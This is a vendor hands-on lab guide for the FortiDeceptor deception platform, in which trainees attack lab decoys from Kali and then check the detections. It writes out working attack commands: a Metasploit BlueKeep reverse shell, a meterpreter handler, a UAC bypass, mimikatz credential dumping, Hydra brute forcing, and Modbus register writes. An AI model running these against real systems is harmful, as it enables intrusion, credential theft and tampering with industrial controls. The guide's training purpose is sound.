FortiDeceptor-4.3.0-Threat Prevention and Detection With FortiDeceptor

Threat Prevention and Detection
with FortiDeceptor
FortiDeceptor 4.3.0 Hands on Labs v3
Introduction
Introduction
FortiDeceptor allows organizations to rapidly create a fabricated deception network that lures attackers into revealing
themselves. FortiDeceptor serves as an early warning system by providing accurate detection that correlates an attacker's
activity details and lateral movement, indicating that a breach has happened. Threat intelligence gathered from the attacker
can be applied automatically to inline security controls to stop attacks before any real damage is done.
Participants who attend this workshop will learn how to:
• Deploy deception hosts to uncover attacker activity
• Use the anti-reconnaissance and anti-exploit engine to correlate events into incidents and campaigns, giving SecOps the
information they need to act upon
• Take action on discovered threat actor activity by integrating with the Fortinet Security Fabric to quarantine compromised
hosts before they can do further damage
The Training Agenda will cover the following items below:
1. FortiDeceptor initial configuration and deploying decoy VMs
2. Attack the network and detect lateral movement
3. Increasing the deception surface by deploying deception lures
4. Integration with the Security Fabric for mitigation automation
© Fortinet Inc. All Rights Reserved. 3

1. HoLs Topology and Access Details
1.1 General
• The FortiDeceptor training environment is a cloud platform hosted on FWS and can be accessed via FNDN. The
requirements for accessing the FortiDeceptor training platform are:
• Laptop / PC
• Internet connection
• FortiClient
• Web browser
• Putty client
• This lab was designed to assist you with the deployment and testing of the FortiDeceptor platorm. However, if you have
never used FortiDeceptor before, we recommend experimenting with the platform and Administration Guide on your own
before completing this lab.
• You can find FortiDeceptor recommended product videos / OT Attack Simulation here:
FortiDeceptor 3.0 • FortiDeceptor Testing Guide Against OT-Windows-Linux Decoys https://video.fortinet.com/products/fortideceptor/3.0
• FortiDeceptor & FortiSOAR – protecting the OT network

FortiDeceptor 3.3 • FortiDeceptor integration with FortiNAC https://video.fortinet.com/products/fortideceptor/3.3
• FortiDeceptor Ransomware Detection
• FortiDeceptor 4.0 What’s New https://video.fortinet.com/products/fortideceptor/4.0
FortiDeceptor 4.0
• FortiDeceptor Attack SimulationAgainst OT Decoy https://fortinet.egnyte.com/dl/hcM8BzUzBD - Password: vz6JCw6k
• FortiDeceptor 4.1 What’s New https://video.fortinet.com/products/fortideceptor/4.1
FortiDeceptor 4.1
• FortiDeceptor for SAP https://video.fortinet.com/products/fortideceptor/4.1/fortideceptor-for-sap
• FortiDeceptor and FortiSIEM Deception Token https://video.fortinet.com/products/fortideceptor/4.2
FortiDeceptor 4.2
• Deception Technology - FortiDeceptor for IoT/OT Networks https://video.fortinet.com/products/fortideceptor/4.2/deception-technology-fortideceptor-for-iot-ot-networks

1.2 FortiDeceptor Training Environment Topology
• The FortiDeceptor training environment topology will have the following components:
• FortiDeceptor Virtual appliance: Deploy deception decoys and lures
• FortiGate: Provides network segmentation, network routing, internet, and VPN access to the training environment
• Kali box: Attacker tools framework
• Windows 10: Windows endpoint for deception lure deployment

1.3 Accessing the FortiDeceptor training environment
To access the FortiDeceptor training environment, please follow the instructions below:
• SSL-VPN Access
Open your browser and access the link that was emailed to you from the FNDN system and use the credentials below:
• Link: https://<instance-name>.fortidemo.fortinet.com:10443
• Username: fortideceptor
• Password: FortiDeceptor12#
After successful authentication, you can view the portal that will allow you to access the FortiDeceptor lab components.
The SSL-VPN portal supports SSO, so all the devices should be logged in automatically. If you are prompted to provide
your credentials, use your VPN credentials for access.
The VPN user account can support two VPN end-users at the same time.
• FortiClient
We highly recommend you access the lab over FortiClient. If you
do not have FortiClient, you can download a free trial here:
https://www.fortinet.com/support/product-downloads#vpn
Install the client and add a new connection with the following
parameters:
VPN SSL-VPN
Connection Name FDC
Remote Gateway <instance-name>.fortidemo.fortinet.com
Customize Port 10443
Client Certificate None
Username fortideceptor
Password FortiDeceptor12#
The VPN user account can support two VPN end-users at the
same time. You can access the VPN from your laptop/pc directly
to the FortiDeceptor.

• Lab IPs
Platform IP Address User credentials

Username: fortideceptor
FortiDeceptor IP (HTTP/SSH) 192.168.1.100
Password: FortiDeceptor123$
Windows10 IP (RDP) 192.168.2.200
Password: FortiDeceptor12#
Kali IP (SSH/VNC) 192.168.2.201 Password: FortiDeceptor12#
Sudo Password: FortiDeceptor12#

2. The FortiDeceptor Platform
2.1 FortiDeceptor Components
FortiDeceptor management console manages and operates the whole platform, including deployment, configuration,
alerting, analysis, and ECO system integration.
FortiDeceptor offers a highly-scalable 3-tier architecture that combines three levels of deception:
• Server/ Endpoint Lures
• Medium Interaction Decoys (IoT/OT)
• High Interaction Decoys
Deception Lures can be deployed using existing infrastructure tools like A/D GPO, MS SCCM, etc.
A single FortiDeceptor Appliance can run 20 Deception VM's that support 480 IP addresses in total. Each IP address
represents a single Decoy.
The Deception VM can be downloaded from the FortiDeceptor marketplace and allows the end-user admin to bring their
own Gold Image and convert it to a Decoy using the FortiDeceptor Decoy Customization wizard.

2.2 FortiDeceptor Lures
The purpose of the FortiDeceptor Lure Package is to add breadcrumbs on real endpoints/servers and redirect an attacker to
engage with a Decoy instead of a real asset. A Deception Lure is typically distributed to real endpoints and servers on the
network to expand the deception surface.
The current FortiDeceptor Token Packages are:
Platform Token Packages When the FortiDeceptor Token Package is installed on a real Windows,
Linux, or MAC endpoint, it increases the deception surface and
 SMB
redirects an attacker to engage with a Decoy instead of a real asset.
 FTP
 RDP Effective Deception Lure technology should support these key points:
Windows  SSH
 Cached Credentials • Deploy Deception Lure data and configurations where attackers
 Fake network connections collect information.
HoneyDocs
•

Deception Lure location must be Invisible to end-users (without
 SMB (SAMBA) affecting endpoint functionality).
Linux  RDP (xfreerdp)
 SSH • Deception Lure is accessible with user-level permissions. The
attacker can access these lures early in the compromise activity and
 SMB (SAMBA)
get detected, and potentially reduce the privileged escalation attack
MAC  RDP (xfreerdp) time.
 SSH
2.3 FortiDeceptor Decoys
FortiDeceptor creates a network of Decoys to lure attackers and monitor their activities on the network. When attackers
attack a Decoy, first, they generate an alert; second, their malicious activities are captured and analyzed in real-time to
generate a mitigation and remediation response and protect the network.
The Current FortiDeceptor Decoys are:
Decoys Lures
 Windows 7
 Windows 10 (can be deployed as a gold image)
Windows
 Windows 2016 (deployed as a gold image)
 Windows 2019 (deployed as a gold image)
Linux  Ubuntu Desktop
 SCADA Decoy:
 11 OT protocols
 Medical Decoy:
IoT/OT
 PACS
 DICOM
 Infusion Pump
VPN  Fortinet SSL-VPN (FGT60E, FGT100F, FGT1500D, FGT2000E,FGT3700D)
 ERP
Platform Decoys  POS
 GIT
 Cisco router
IoT Decoys  HP printer
 IP Camera
2.3 FortiDeceptor Decoys
The Current FortiDeceptor monitor services are:
• Windows: RDP, SMB, HTTP/S, DB(SQL)
• Linux: SSH, SAMBA, HTTP/S
• IoT/OT: HTTP, FTP, TFTP, SNMP, MODBUS, S7COMM, BACNET, IPMI, TRICONEX, GUARDIAN-AST, IEC104, ENIP,
DNP3
• SSL VPN: HTTPS
• Platform: HTTP/S, GIT,
• Medical: PACS, Telnet, FTP, DICOM
• IoT: SNMP, Telnet, HTTP/S, Jet-Direct, UPNP, CDP, RTSP
The current FortiDeceptor IP address capacity:

• A Single FortiDeceptor appliance (HW/VM) can host up to 20 Deception VM.
• A Single Deception VM supports up to 24 IP addresses, meaning 24 Decoys (each IP represents a Decoy).
• A Single FortiDeceptor appliance (HW/VM) can support up to 480 IP addresses.
• With 4 Decoys per segment on average, a single FortiDeceptor appliance (HW/VM) can support up to 128 segments
(VLANS).

3. Hands on Labs Tasks
Lab: Tasks
Section Lab Name Objective Estimated Time
3 Admin Tasks Prepare lab environment. 15 minutes
Act as a bad entity and discover elements of interest on the network segment and
Network Reconnaissance Attacks 15 minutes
use FortiDeceptor to analyze the incidents
Lateral Movement Detection: Expanding the Learn how to expand the deception surface with Lure Deployment packages -
10 minutes
Deception Surface tokens
4
Configure and test the deployment of HoneyDocs tokens and analyze incidents
Lateral Movement Detection: HoneyDocs Lure 10 minutes
reported in FortiDeceptor
Decoy Engagement: Post Exploitation Analyze decoy capture and records of attacker’s activities 10 minutes
5 SQL Deception
6 Tomcat Deception Configure, test and analyze the interaction with SQL, Tomcat and/or SIP Decoy 15 minutes
7 SIP Decoy
8 Network Attacks: SCADA Decoy (MODBUS)

9 Network Attacks: SCADA Decoy (IEC) Configure, test and analyze the interaction with Modbus decoy 10 minutes
10 Network Attacks: IoT Decoys
11 Outbreak Alerts for Recent Vulnerabilities Configure, test and analyze the interaction with Spring4Shell outbreak Decoy 10 minutes
12 Fabric Integration Configure, test and analyze the remediation using FortiGate integration 10 minutes
13 Decoy Deployment Configure how to deploy Decoys required to complete the labs
At the end of the labs, please follow this steps as outlined in this section of the
14 Cleanup 5 minutes
Labs
3 FortiDeceptor Initial Configuration
Before we start: PREPARATION
!!!Attention!!! READ THIS CAREFULLY: PREPARATION:
Access the FortiDeceptor web management console via SSL–VPN (https://192.168.1.100). Ignore the fabric login option. In
case you see static data regarding incidents, events and/or lure distribution, please reset the configuration first
Just login to CLI using the same credentials as for the UI login and perform a data purge.
Run data-purge –a
After performing the command, type ‘y’, the FortiDeceptor unit will clean
all data and do a reboot. This will take some time.
3. FortiDeceptor Management Console: Administrator Tasks
• Exercise: FortiDeceptor management console and configuration
In this exercise, we will familiarize ourselves with the FortiDeceptor management console and apply the initial configuration.
FortiDeceptor Administrator tasks:
1. Access the FortiDeceptor web management console via SSL–VPN

(https://192.168.1.100).
2. Verify the FortiDeceptor has a valid license under the dashboard

widget called System Information. Refresh the widget if needed.
We have already added the license in the lab environment.
On a brand-new deployment, you are required to register the

license with FortiCloud and upload the license using the widget as
presented on the right.
3. Its ok if „FDN Download Server“ and „Web Filtering Server“ are

in a yellow state after reboot. It takes some time until
FortiDeceptor will connect to the online servers and validate the
correct status. © Fortinet Inc. All Rights Reserved. 19
3. Navigate to the Deception > Deception OS menu and confirm if Decoys win10v1, ubuntu16v2, ubuntu18v1, voipv1,
outbreakv1 and scadav3 are initialized.
On a brand-new appliance, you need to click Download next to each Decoy.
4. Navigate to Deception > Deployment Network menu to add a deployment network where the Decoy VM will be
deployed.
A Deployment Network is a network segment where the Decoy will be deployed. It can be configured as either a VLAN
or a subnet. The deployment network must be configured before the Decoy VM can be deployed.
5. Now we are going to create the deployment network for the Decoy deployment (192.168.2.0/24).
• Click on +Add New Vlan/Subnet.
• Configure the following settings:
Name deploynet1
Interface port2
VLANID 0
Deploy Monitor IP/Mask 192.168.2.100/24
Gateway 192.168.2.1
ARP Protection Uncheck (this is for ARP spoofing/poisoning detection)
Tag any © Fortinet Inc. All Rights Reserved. 20
6. In the latest v4.3, there’s an option to test the deployment network (port2 in this case) to ensure that it’s fit for decoy
deployment. At the moment, this can only be done via CLI:
a. Log onto the FortiDeceptor’s CLI either via CLI icon on the top left of the GUI or ssh directly into the
FortiDeceptor’s CLI
b. Run test-deployment-network -iport2 -m00:00:00:00:00:00
c. You should see a message informing you that The network on port2 is good for decoy deployment

4. Attack the network and Detect
Lateral Movement
4.1 Network Reconnaissance Attacks (before the lateral movement)
• Deploy windows Decoy and make sure it’s up & running as described in section 13.1 (Windows Decoy Deployment).
Please note that may take some time.
• After successful deployment, the status the “Decoy Status” should be like:
We are now going to switch roles and become the attacker. We are going to do some active reconnaissance and scan for
open ports to find any interesting services. We are then going to try to use these services to infiltrate the network.
Find Running Services

We are going to use Nmap, a network scanner, to discover services running on the network IP range192.168.2.0/24.
Nmap is an open-source utility used to discover hosts and services on a computer network by sending packets and
analyzing the responses. Nmap provides several features for probing computer networks, including host discovery and
service and operating system detection.

To find running services:
1. Access KALI using your putty client to address 192.168.2.201 or through the SSL-VPN portal.
2. Log in with your username and password.
3. Run the NMAP command pointing to the Win10 Decoy IP:
@kali:~$ nmap -F –sV -Pn 192.168.2.11
Nmap options:
• -F option specifies to scan for the top 100 common ports.
• -sV is used to probe any opens ports to determine their services/version information. The version information can be useful to look up and see if there are
any known vulnerabilities for the service.
• -Pn option disables host discovery using icmp.

Viewing events
FortiDeceptor creates a network of Decoy VMs to lure attackers and monitor their activities. Once attackers attack Decoy VMs,
their actions are analyzed to protect the network.
We are now going to switch back to being the FortiDeceptor administrator.
1. Return FortiDeceptor web console.
2. Go to Incident > Analysis.
3. Set the ”Show” filter to “All”
You should see an incident with the Attacker IP, 192.168.2.201, Victim IP (192.168.2.x), and Victim Port(s).
FortiDeceptor has the concept of Events, Incidents, and Campaigns.
An Event can be an opening or closing a port, for example. Incidents are made up of connected Events.
Campaigns are then made up of connected Incidents. Here we can see the four events caused by the NMAP scan,
which make up the Incident. The port is opened, a connection is established, a command is executed, and the port is
closed. © Fortinet Inc. All Rights Reserved. 25
An attacker that will detect RDP port (3389) will find the User
and Password by running brute force attack or running an
exploit against the service for getting a remote shell.
The attacker will use Hydra, which is a brute force password

cracking tool. Hydra can use both username and password
lists to determine the correct login credentials needed to
access a service.
From the Kali terminal window, run the following command:

@kali:~$ hydra -V -f -l hydra-test -P /usr/share/metasploit-framework/data/wordlists/default_pass_for_services_unhash.txt
rdp://192.168.2.11 -t 1

FortiDeceptor will detect this attack, and all the attack alerts will be under the incident analysis section (Incident >
Analysis)
Note: Toggle the Show dropdown box to view different events

Probing the network for outdated OS
An additional network reconnaissance method is to probe the network for outdated OS using the NMAP tool as well as a
newer exploit against them.
The following command will discover all the OS on the network:
@kali:~$ sudo nmap -O 192.168.2.1-254

In this role play, following the lab, we discovered through reconnaissance that there is Win10 with RDP service open on the
network with IP address 192.168.1.12.
If we act as an attacker, what is our next step?
• Running a new exploit that affected most of the Windows’s versions to get a remote shell. We will use Metasploit to run
remote code execution against RDP vulnerability.
fortideceptor@kali:$ msfconsole
msf6 > use windows/rdp/cve_2019_0708_bluekeep_rce
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.2.11 (Windows Decoy)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RDP_CLIENT_IP 192.168.2.201 (Kali Machine)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload generic/shell_reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit -f

4.2 Lateral movement Detection: Expanding the attack surface
Use Case - Lateral movement detection using Windows Lure (Token) Packages
Let's assume the attacker accessed a remote shell on a real desktop inside the network via a spear phishing attack and
started to move latterly based on information collected from the infected endpoint.
We will deploy a Deception Lure on the infected endpoint and run a malicious file to allow the attacker to get backdoor
access called meterpreter.
To deploy a Deception Lure on an infected endpoint:
1. Go to Deception Token and click on the +Campaign button to create a new Token Package.
2. Use following settings to create the Token package and press Save.
Campaign Name WIN

Mode Online
Lure Types Check RDP and Check SMB for the Windows Decoy

3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or through the
SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (Bookmark for 192.168.1.100) using the known
credentials.
a. Go to the Deception Token menu.
b. Download the Deception Lure for the Windows 10 decoy from the windows desktop.

5. Unzip the file. to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or
through the SSL-VPN web portal.
6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. After isntallation of the Tokens verify on FortiDeceptor > Deception > Deception Token > Token Deployment Status
that the workstation has successfully layed the „breadcrumps“. As we use „online“ Tokens you can change the Tokens at
any time and FDC will upload the changes to the workstation.

8. Access the Kali at the IP address 192.168.2.201 with your credentials.
9. After you access the KALI box, run the Metasploit tool (as root using sudo):
fortideceptor@kali:~$ sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.2.201
msf6 exploit(multi/handler) > set LPORT 4443
msf6 exploit(multi/handler) > exploit
Go back to the windows desktop and run the file office.exe on the My Documents directory.
You should be able to access the KALI box through a backdoor session to the windows desktop machine called
meterpreter. This allows you to load the attacker framework and get full access to the Windows OS and extract information
such as saved passwords, network, and more.
The Deception Lure expands the attack surface and provides fake information and credentials to the threat actor to deceive
the malicious activities into engaging with a fake asset instead of a real one.
Exercise: Collect information from an infected

In this exercise, we will use the meterpreter backdoor to collect information from the infected machine and find and decrypt
the saved password in the windows credential manager and use them to move laterally.
Once the endpoint is compromised, the threat actor will use non-malicious commands and tools to collect information
without generating any security alerts. At this stage, our deception technology will detect the attack early in the chain.
To collect information from an infected machine:
1. On the meterpreter session, please run the following commands to simulate the threat actor activity for collecting.
This command displays the endpoint ARP table.The network connection deception lure
will inject a static ARP entry that point to a Decoy. The attacker will analyze the
meterpreter > arp ARP table and will "learn" on a new network. If the attacker tries to access the
new IP from the ARP table, it will lead to a decoy engagement that will generate an
alert.
This command will present the infected endpoint local drive and the attached network
drive. The attacker will enter the drives to find sensitive files and learn from the
meterpreter > show_mount files about the endpoint owner (financial, HR, R&D, role, etc).If the attacker
enters the fake network drive, it will lead to a decoy engagement that will generate
an alert
You will notice that you are missing the privileges to get system information. You
have also not enough permissions to read the credential manger to extract usernames
meterpreter > getsystem
and password.
We need to take additional steps…
2. Let’s continue the attack, were we need to gain administrative privileges by running an escalation exploit.
meterpreter > ps –A x64 Show x64 processes – select one of the svchost processes and the PID number.
meterpreter > migrate <PID> Lifts the remote process to an the a x64 process.
Moves the backdoor session to the background to run more command from the
meterpreter > background © Fortinet Inc. All Rights Reserved. 34
Metasploit console.
3. To continue the attack, we need to gain administrative privileged by running a privilege escalation exploit.
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac_sdclt
msf6 exploit (windows/local/bypassuac_sdclt) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit (windows/local/bypassuac_sdclt) > set SESSION 1
msf6 exploit (windows/local/bypassuac_sdclt) > set LHOST 192.168.2.201
msf6 exploit (windows/local/bypassuac_sdclt) > set LPORT 4443
msf6 exploit (windows/local/bypassuac_sdclt) > exploit
After the attack you will end up in the meterpreter console again
4. Now we have the needed privileges to run the next commands.

meterpreter > getsystem Privileged escalation attack.
meterpreter > load kiwi Loads the mimikatz tool.
meterpreter > kiwi_cmd sekurlsa::credman Dumps the Windows credentials manager password.
Now that the threat actor has dumped the infected endpoint password from the Windows credentials manager, the stolen
credentials will be used for lateral movement.
In this example we got:
Username: Windows10\matthew > SMBUser
Domain: 192.168.2.11 > RHOST
Password: iloveyou > SMBPass
In your case it will be a different login as the decoy credentials are random created.
5. Stop the Metasploit tool and use the SMB client on the KALI box to access 192.168.2.11 vis SMB using the extracted
credentials.
• Exit Metasploit:
msf6 exploit (windows/local/bypassuac_sdclt) > exit –y
• Perform SMB login using previously obtained credentials (matthew//iloveyou)

@kali:~$ smbclient -U matthew -L 192.168.2.11

• Once we have a Share-name, we can access the shares using the following command:
@kali:~$ smbclient //192.168.2.11/matthew03-26-2020 -U\matthew
smb:\> ? smb:\> ls
When we connect to the share, it is easy to manipulate the files using available options > For example downloading a file:
smb:\> get Leave_Notice_PTO.docx
In this case, the credentials provide Access to the Windows endpoint and present the existing network shares that the credentials can
access but even in this early stage of the attack, the FortiDeceptor will generate a security alert on network drive access
Note
In the current 4.3 release we identify a software anomaly with Windows SMB lures
that prevent Incident Analysis logs to be displayed. This will be resolved in the
coming release.

4.3 Lateral Movement Detection: HoneyDocs Lure
Use Case - Lateral movement detection using Linux Lure (Token) Package HoneyDocs
In this exercise, we will create and deploy a Linux based HoneyDocs Deception Lure Package (token) on the Windows Device
(real endpoint). FortiDeceptor token package will be used to add breadcrumbs on real endpoints and lure an attacker to a
Linux based Decoy VM. Tokens are normally distributed within real endpoints and other IT assets on the network to maximize
the deception surface.
Note:
Before we start this exercise, please deploy Linux-Decoy as described in Section 13.2 of this guide (Linux Decoy Deployment)
To deploy a Deception Lure on an infected endpoint:

1. Go to Deception Token and click on the +Campaign button to create a new Token Package

2. Use following settings to create the Token package and press Save
Campaign Name HoneyDocs
Mode Online
Lure Types Check HoneyDoc for the Linux Decoy
Default at Recent folders, you may specify path you

Installation Path intended.(In this exercise, you may use
%user%\Downloads)
3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP Client with your credentials or through the
SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (Bookmark for 192.168.1.100) using the known
credentials.
a. Go to the Deception Token menu.
b. Download the Deception Package (token) for the HoneyDocs Lure to the windows desktop.
5. Unzip the file.

6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. Once the lure successfully deployed, you should be able to notice that there were fake contents created under
Downloads directory. You have to make sure that view hidden files option is checked.
Note: During HoneyDocs Token package installation, an existing token

package is automatically uninstalled

4.3 Lateral movement Detection: HoneyDocs Lure
8. You may also view the Token Deployment Status under Deception Token as below:
9. Browse to the downloads folder, open any of the pdf. Allow the pop up asking to allow connection.

4.3 Lateral movement Detection: HoneyDocs Lure
10. Now, check the campaign details. You should notice an alert generated from the windows machine to the Linux decoy
with web service enable. When you open the document on the real endpoint, the file generates a web connection to
the web server on the Linux decoy.

4.4 Decoy Engagement: Post Exploitation
Use Case – Monitoring and Analyzing Attacker’s Activity
Assuming the attacker accessed a remote shell on the Decoy, let's see how the Decoy captures, records and analyzes the
attacker's activities on the Decoy.
SSH Access to Linux-Decoy

1. Open the putty client and connect the Linux Decoy over SSH protocol.
2. Get SSH username and password from Linux Decoy via „Decoy Satus“
overview by clicking on the button which will open a detail window.
3. Run several commands such as:
@ubuntu16v1:~$ ls
@ubuntu16v1:~$ ping 8.8.8.8
@ubuntu16v1:~$ wget www.google.com
@ubuntu16v1:~$ mkdir test
@ubuntu16v1:~$ nano test.txt
Note: fill the file with content and save the file
4. Access the Incident Analysis section and open
the alert to see if the all of the attacker activities
were recorded and analyzed.
4.4 Decoy Engagement: Post Exploitation
RDP Access to Windows Decoy
1. Open the RDP client and connect the Decoy over RDP protocol. (Note: RDP doesn’t work well with SSL-VPN web-
portal)
2. Get RDP username and password from Linux Decoy via „Decoy Satus“
overview by clicking on the button which will open a detail window.
3. Open the command line and run several commands such as:
Run several commands such as:
@ubuntu16v1:~$ ping 8.8.8.8
@ubuntu16v1:~$ net user
@ubuntu16v1:~$ dir
4. Open a browser and access the website https://wfurltest.fortiguard.com .
Note - This is the End of Windows and Linux Decoy use cases, please delete the Win10 and Linux-Decoy decoy.

5. SQL Deception
5. Probing the SQL Decoy
• Deploy SQL Decoy and make sure it’s up & running as described in section 13.7 (SQL Decoy Deployment). Please note
that may take some time.
Probing the SQL Decoy

To verify the SQL Decoy has been successfully deployed, use nmap to check the MySQL service is activated on the
targeted system or not with the following command;
@kali:~$ nmap -sT –Pn 192.168.2.16
You should notice service is activated on the default port 3306 as the example below.

With the port 3306 open for MySQL service (Note MariaDB is a fork out from mysql), let’s enumerate it with the following
command and we shall be able to retrieve the MySQL information such as version, protocol and etc;
@kali:~$ nmap --script=mysql-info 192.168.2.16
By now, you should notice incident was triggered. Browse to Incident->Analysis and you should see multiple
Reconnaissance Events from the Kali Linux machine to the SQL-Decoy.

You may also generate some Interactive Events by connecting to the SQL-Decoy hosted Database. Please use any
generated lure users to connect to the database like below;
fortideceptor@kali:~$ mysql -u <username> -p -h 192.168.2.16 CustomerDB
Once the connection is successful issue multiple database commands (eg ‘show tables;’ or ‘show databases;’)
Browsing back to the FortiDeceptor dashboard-> Incident-> Interaction, you should notice the connection to the MySQL
database and also query executed by the attacker.

Note - This is the End of SQL-Decoy use case, please delete the SQL decoy.

6. Tomcat Deception
6. Probing the Tomcat Decoy
• Deploy Tomcat Decoy and make sure it’s up & running as described in section 13.6 (Tomcat Decoy Deployment).
Please note that may take some time.
Probing the Tomcat Decoy

To verify the Tomcat Decoy has been successfully installed,
open the browser in Windows device (192.168.2.200) and
browse to the decoy IP and port (http://192.168.2.15:8080)
The welcome page will be displayed.

6. Probing the Tomcat Decoy
• Browsing back to the FortiDeceptor dashboard-> Incident-> Interaction, you should notice the browsing activity from
the attacker to the decoy.
Note - This is the End of Tomcat-Decoy use case, please delete the Tomcat-decoy.

7. SIP Decoy
7. Probing the SIP Decoy
• Deploy SIP Decoy and make sure it’s up & running as described in section 13.9 (SIP Decoy Deployment). Please note
that may take some time.
Network Discovery
Discover the network using nmap. From the Kali linux CLI:
fortideceptor@kali:~$ nmap 192.168.2.0/24
The result should list the sip decoy as SIP server in the network.

Login to FortiDeceptor and find the Reconnaisance Events. Try to find the post scanning activity identified by ARAE Engine.

Using metasploit framework scanner to identify the SIP server type and version.
fortideceptor@kali:~$ msfconsole
msf6 auxiliary(scanner/sip/options)> use auxiliary/scanner/sip/options
msf6 auxiliary(scanner/sip/options)> show options
msf6 auxiliary(scanner/sip/options)> rhosts 192.168.2.18
msf6 auxiliary(scanner/sip/options)> run
On FortiDeceptor, under Incident Analysis, find the Interaction incident

Note the following:
• function used: OPTIONS
• Version of the SIP Server: 2.0
• Username used: nobody
(the same username used in the scanner options)

SIP Users enumeration
On FortiDeceptor, View the SIP decoy lures. Note down two lure credentials (username & password).
Go to Deception-> Decoy Status. Select the SIP decoy and Click View – the eye icon.

Login to Kali terminal using ssh. Go to the Downloads Folder, you should be able to see two files: sip_clientv1.py &
users.txt.
Edit the users.txt file using the ‘nano’ tool and add the two lures info that you have marked down before.
We took the first two in this example:
When you edit the file, make sure that you don’t leave white spaces or empty lines in the text file.
Run a brute force attack using the sip client script which will use the users:password trying to register to the SIP server.
Issue the command line: python3 sip_clientv1.py 192.168.2.18 5060 users.txt

Note that the script could identify the valid users available on the SIP server from the dictionary file which can be used later
on for more sophisticated attacks.
To have more details what the script is using to identify correct SIP usernames. Go to FortiDeceptor Interaction Incidents.
(It might take a few seconds to appear under Incident>Analysis)
Try to get the following:
• The SIP Function used: REGISTER

• SIP version Used: 2.0
• Username used: entry from users.txt file
• User-Agent Used: Linphone (popular voip client).

Note: This is the End of SIP-Decoy use case, please delete the SIP-Decoy
8. Network Attacks: SCADA Decoy
Modbus
8. Network Attacks: SCADA Decoy (Modbus)
• Deploy SCADA Decoy and make sure it’s up & running as described in section 13.3 (Siemens-S7-200 PLC Decoy
Deployment). Please note that may take some time.
FortiDeceptor allows you to deploy OT assets using the SCADA3 Decoy. We will use KALI to test the SCADA Decoy.
Enumeration Testing using NMAP:
@kali:~$ sudo nmap -sU -p 161 --script snmp-sysdescr 192.168.2.12

@kali:~$ nmap -Pn -sT -p102 --script s7-enumerate.nse 192.168.2.12 (discover using the S7 protocol)
@kali:~$ nmap --script enip-info -sT -p 44818 192.168.2.12 (discover ENIP protocol)
Please ignore any error messages in the output, the main idea of these commands is the enumeration and verify the host
status.

MODBUS Protocol Testing:
fortideceptor@kali:~$ modbus read 192.168.2.12 %M100 20 (read MODBUS parameter)

MODBUS Protocol Testing:
@kali:~$ modbus write 192.168.2.12 %M100 1

Modbus values can easily be changed when Access is open. For example:
@kali:~$ modbus read 192.168.2.12 %M100 5

@kali:~$ modbus write 192.168.2.12 %M100 0 0 0 0 0
@kali:~$ modbus read 192.168.2.12 %M100 5
Verify the values are overwritten with the new values
This is the End of Siemens-S7-200 decoy use case, please delete the Siemens-S7-200 decoy.

9. Network Attacks: SCADA Decoy
IEC
9. Network Attacks: SCADA Decoy (IEC)
IEC Exploitation:
Note: You will need Siemens-S7-300 PLC Decoy VM to run this lab. Please deploy SCADAv3 again& Select S7-300 PLC
from the “Available Deception Decoys” with the same IP address settings used for Siemens-S7-200 decoy (192.168.2.12).
@kali:~$ msfconsole
msf6 > use auxiliary/client/iec104/iec104
msf6 auxiliary(client/iec104/iec104) > set RHOSTS 192.168.2.12
msf6 auxiliary(client/iec104/iec104) > exploit
Please ignore the returned message and verify the incidents on FortiDeceptor.
This is the End of Siemens-S7-300 decoy use case, please delete the Siemens-S7-300©decoy.
Fortinet Inc. All Rights Reserved. 69
10. Network Attacks: IoT Decoys
• Deploy IoT Decoy and make sure it’s up & running as described in sections 13.4 (HP Printer IoT Decoy Deployment) &
13.5 (Cisco Router 2691 IoT Decoy Deployment).
FortiDeceptor allows you to deploy IoT assets using the IoT Decoys such as Cisco router, HP printer and IP camera.You
can access the Cisco decoy using the Telnet/Web interface and try to read/write configuration. We will use KALI to test the
IoT Decoys.
Enumeration Testing using NMAP (require to be run as root user “sudo”):
@kali:~$ sudo nmap –sS –Pn –T5 –vv <CiscoIOS decoy IP / HP Decoy IP>
@kali:~$ sudo snmap -sU -p 161 --script snmp-sysdescr <CiscoIOS decoy IP / HP Decoy IP>

Enumerating the Printer Decoy:
1. Access the Kali Linux machine $HOME directory (fortideceptor user). From the command line, issue the following
command against the printer decoy:
@kali:~$ cd PRET
@kali:~$./pret.py 192.168.2.13 pjl
2. Get the CLI inside the Printer decoy.

You can also access the decoy via your web browser directly from your desktop or through the Win10 desktop.

3. Verify the incidents in FortiDeceptor and the commands issued. Try the command “print”.
4. Now have a look at the Incident > Analysis tab based on the IP of printer decoy. You should see MITRE ICS Techniques
with reference to specific segments of the MITRE ATT&CK framework in which the attack/exploit maps to
5. If you move to the Incident > MITRE ICS tab, you’d see the exact mappings of the attack
This is the End of IoT decoys use case, please delete HP-Printer and CiscoIOS decoys.

11. Outbreak Alerts for recent
vulnerabilities
11. Outbreak Alerts for recent vulnerabilities
• Deploy Outbreak Decoy and make sure it’s up & running as described in section 13.8 (Spring4Shell Outbreak Decoy
Deployment). Please note that may take some time.
Introduction to Outbreak Alerts decoy:

When a cybersecurity incident/attack/event occurs that has large ramifications for the cybersecurity industry and affects
numerous organizations, FortiGuard Outbreak Alerts will be the mechanism for communicating important information to
Fortinet's customers and partners.
These Outbreak Alerts will help you understand what happened, the technical details of the attack and how organizations
can protect themselves from it and others like it.
The FortiDeceptor Deception VM called outbreakv1 provides the outbreak vulnerabilities that the FortiGuard Outbreak
Alerts cover.
For example, you can deploy a network decoy based on FortiGuard Outbreak Alerts such as Spring4Shell, Log4j2 and
Exchange but for this lab we stick to Spring4Shell only.

Preparation for vulnerability scan:
